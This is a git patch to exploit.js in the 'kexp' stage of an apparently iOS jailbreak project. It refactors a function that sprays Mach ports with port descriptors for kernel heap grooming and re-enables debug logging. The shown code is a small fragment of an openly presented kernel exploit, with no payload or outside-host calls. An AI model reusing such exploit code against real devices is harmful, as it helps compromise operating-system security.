From 54b6c9d393e2384f7833155509f2e09677360390 Mon Sep 17 00:00:00 2001 From: spv420 Date: Mon, 1 Aug 2022 01:14:39 -0400 Subject: yahtzee --- src/stage4/kexp/exploit.js | 25 ++++++++++--------------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 68ed794..c72963c 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -203,28 +203,23 @@ function spray(dict, size, port) { var kp = 0; function spray_ports(number_port_descs) { if (kp == 0) { - kp = shit_heap(4); - mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp); - mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); - } else if (read_u32(kp) == 0) { - kp = shit_heap(4); - mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp); - mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND); + kp = new mach_port_t(); + mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp.addy); + mach_port_insert_right(task_self, kp.deref(), kp.deref(), MACH_MSG_TYPE_MAKE_SEND); } - var mp = shit_heap(4); + var mp = new mach_port_t(); - var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); -// p0laris_log("mpa %d (%s)\n", ret_, mach_error_string(ret_)); - ret_ = mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); -// p0laris_log("mpir %d (%s)\n", ret_, mach_error_string(ret_)); + var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp.addy); + p0laris_log("mpa %d (%s)\n", ret_, mach_error_string(ret_)); + ret_ = mach_port_insert_right(task_self, mp.deref(), mp.deref(), MACH_MSG_TYPE_MAKE_SEND); + p0laris_log("mpir %d (%s)\n", ret_, mach_error_string(ret_)); - ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + ret_ = send_ports(mp.deref(), kp.deref(), 2, number_port_descs); p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_)); - var ret = read_u32(mp); - shit_heap_free(mp); + var ret = mp.deref(); return ret; } -- cgit v1.2.3